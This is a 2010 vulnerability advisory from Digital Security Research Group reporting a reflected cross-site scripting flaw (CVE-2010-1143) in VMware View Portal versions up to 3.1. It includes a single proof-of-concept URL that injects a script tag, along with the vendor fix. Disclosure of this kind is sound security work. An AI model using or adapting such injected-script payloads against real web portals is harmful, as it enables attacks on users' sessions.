VMware Portal 3.1 Cross Site Scripting

`  
  
[DSECRG-09-058] Vmware View - XSS vulnerability  
  
Linked XSS in VMware Portal  
  
Digital Security Research Group [DSecRG] Advisory DSECRG-09-058  
  
Application: VMware View Portal  
Versions Affected: <= 3.1  
Vendor URL: http://www.vmware.com  
Bugs: XSS  
Exploits: YES  
Reported: 07.09.2009  
Vendor response: 21.09.2009  
Date of Public Advisory: 05.05.2010  
CVE: CVE-2010-1143  
Author: Alexey Sintsov  
from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)  
  
  
Description  
***********  
  
Linked XSS in VMware Portal  
  
  
Details  
*******  
  
An attacker may inject JavaScript code into url.  
  
Example:  
********  
  
https://[VMware_Portal_IP]/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>  
  
Solution  
********  
Update VmWare View to version 3.1.3  
  
References  
**********  
http://dsecrg.com/pages/vul/show.php?id=149  
http://lists.vmware.com/pipermail/security-announce/2010/000092.html  
  
  
About  
*****  
  
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsecrg [dot]com  
http://www.dsecrg.com   
  
`